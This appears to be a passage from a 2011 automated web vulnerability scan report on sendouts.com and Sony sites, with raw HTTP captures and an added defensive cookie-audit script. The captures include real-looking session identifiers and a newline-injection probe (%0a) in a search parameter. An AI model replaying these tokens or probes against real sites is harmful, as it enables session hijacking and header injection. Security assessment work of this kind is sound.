By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


6.1. http://webconnect.sendouts.com/forgot-login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /forgot-login.aspx

Request

GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:32:33 GMT
Content-Length: 4005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<HTML>
<HEAD>
       <title>Get My Login Information</title>
       <meta name
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjA1MjAyMDk2NGRk" />
...[SNIP]...

6.2. http://webconnect.sendouts.com/job-search.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /job-search.aspx

Request

GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:40 GMT
Content-Length: 9831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Search Open
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

6.3. http://webconnect.sendouts.com/login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

7. Cookie without HttpOnly flag set
There are 16 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, the cookie's value cannot be read or written by client-side JavaScript (for example through document.cookie). This stops an injected script from trivially exfiltrating a session cookie. It does not stop that script from issuing requests that the browser will still send with the cookie attached, so it limits the impact of cross-site scripting rather than preventing it.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless a legitimate client-side script in your application genuinely needs to read or write a cookie's value, set the flag by adding the HttpOnly attribute to the relevant Set-Cookie header (and add Secure as well for any cookie issued over HTTPS).

Be aware that the protection given by HttpOnly has been bypassed in some circumstances (cross-site tracing via the HTTP TRACE method in older browsers is the classic case), and that client-side script injection enables many other serious attacks besides cookie theft: an injected script can simply perform actions in the victim's session directly, without ever reading the cookie.
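The check behind this issue is mechanical: parse each Set-Cookie header, look for the HttpOnly (and Secure) flags, and rate a missing flag higher when the cookie name looks like a session identifier. The following script is an added example, not part of the scanner output on this page. It audits raw HTTP responses modelled on the captures below (the sample responses are constructed for this example), reproduces the Low/Information split used in the instances that follow, and shows the remediation side by appending the missing flags to a Set-Cookie value. The session-name heuristic (SESSION_NAME_HINTS) is this example's own assumption, not the scanner's actual rule.

```python
"""Audit Set-Cookie headers for missing HttpOnly/Secure flags and harden them."""
from dataclasses import dataclass

# Substrings that usually mark a session identifier. Heuristic chosen for this
# example (assumption); the scanner that produced this report may use another rule.
SESSION_NAME_HINTS = ("jsessionid", "asp.net_sessionid", "phpsessid", "sess", "sid", "token", "auth")


@dataclass
class CookieFinding:
    name: str
    raw: str              # the original Set-Cookie header value
    http_only: bool
    secure: bool
    looks_like_session: bool

    @property
    def severity(self) -> str:
        """Mirror the report's rating: session-like cookie -> Low, anything else -> Information."""
        if self.http_only:
            return "ok"
        return "Low" if self.looks_like_session else "Information"


def parse_set_cookie(value: str) -> CookieFinding:
    """Split one Set-Cookie value into its name and attribute flags (RFC 6265 style)."""
    pieces = [p.strip() for p in value.split(";")]
    name, _, _cookie_value = pieces[0].partition("=")
    # Attribute names are case-insensitive; HttpOnly and Secure are bare flags.
    attrs = {p.split("=", 1)[0].strip().lower() for p in pieces[1:] if p}
    lname = name.strip().lower()
    return CookieFinding(
        name=name.strip(),
        raw=value,
        http_only="httponly" in attrs,
        secure="secure" in attrs,
        looks_like_session=any(hint in lname for hint in SESSION_NAME_HINTS),
    )


def audit_response(raw_response: str) -> list:
    """Return one CookieFinding per Set-Cookie header in a raw HTTP response."""
    head, _, _body = raw_response.partition("\r\n\r\n")
    findings = []
    for line in head.split("\r\n")[1:]:            # skip the status line
        header, sep, hvalue = line.partition(":")  # first colon only; values may contain ':'
        if sep and header.strip().lower() == "set-cookie":
            findings.append(parse_set_cookie(hvalue.strip()))
    return findings


def report(raw_response: str) -> list:
    """Compact (name, severity) view of audit_response, handy for asserting on."""
    return [(f.name, f.severity) for f in audit_response(raw_response)]


def harden_set_cookie(value: str, https: bool) -> str:
    """Append the flags a Set-Cookie value is missing. Secure only makes sense over TLS."""
    finding = parse_set_cookie(value)
    out = value.rstrip().rstrip(";")
    if not finding.http_only:
        out += "; HttpOnly"
    if https and not finding.secure:
        out += "; Secure"
    return out


# Constructed sample responses, modelled on the captures in this section.
SAMPLE_TOMCAT = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/\r\n"
    "Location: http://esupport.sony.com\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAMPLE_F5 = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Set-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAMPLE_HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; HttpOnly; Secure\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_TOMCAT, SAMPLE_F5, SAMPLE_HARDENED):
        print(report(sample))
    print(harden_set_cookie("JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/", https=True))
```

The name-based heuristic is deliberately conservative: a cookie such as TS5bbf46 carries a long opaque value yet is rated Information here, exactly as in the instances below, which is why every instance still says to review the cookie's function by hand rather than trusting the rating.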



7.1. http://www.kb.sony.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function. The Server: Apache-Coyote/1.1 header identifies a Tomcat connector; Tomcat can add HttpOnly to its own JSESSIONID cookie through the useHttpOnly attribute of the Context element (supported since 6.0.19 and on by default from Tomcat 7).

Request

GET / HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3.5,"c":"http://esupport.sony.com/US/perl/select-system.pl","pv":3,"lc":{"d0":{"v":3,"s":true}},"f":1315353199262,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/
Location: http://esupport.sony.com
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 18:55:20 GMT


7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/closeviewdocument.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the request already carries two JSESSIONID cookies (one scoped to / from 7.1, one to /selfservice) and the response issues a third; the session scoping across the two paths deserves a look of its own.

Request

GET /selfservice/closeviewdocument.do?externalId=BNP1USESpdf HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice
PRAGMA: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 18:56:37 GMT
Connection: close


7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/extIFrame.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/extIFrame.jsp?docURL=https%3A%2F%2Fwww.docs.sony.com%2FRelease%2FBNP1_US_ES.pdf%23Page%3D1 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 1062
Date: Tue, 06 Sep 2011 18:56:01 GMT
Connection: close


<head>
<style type="text/css">
* {padding:0;margin:0}
body {margin: 0 0px}
</style>
<script language="javascript">
//grab the needed sony variables for the si
...[SNIP]...

7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appFooter.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_appFooter.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 2794
Date: Tue, 06 Sep 2011 18:56:00 GMT


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...

7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appHeader.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_appHeader.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:00 GMT
Content-Length: 4975

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/c
...[SNIP]...

7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Metadata.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_forFrameset_Metadata.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 477
Date: Tue, 06 Sep 2011 18:56:01 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#ffffff" t
...[SNIP]...

7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/getUMBrowseImageById.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/getUMBrowseImageById.do?objectId=DT_MANUAL_1_1&imageType=0 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice
Location: http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
Content-Type: image/png;charset=iso-8859-1
Content-Length: 0
Date: Tue, 06 Sep 2011 18:55:51 GMT


7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TS5bbf46 (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/ HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; 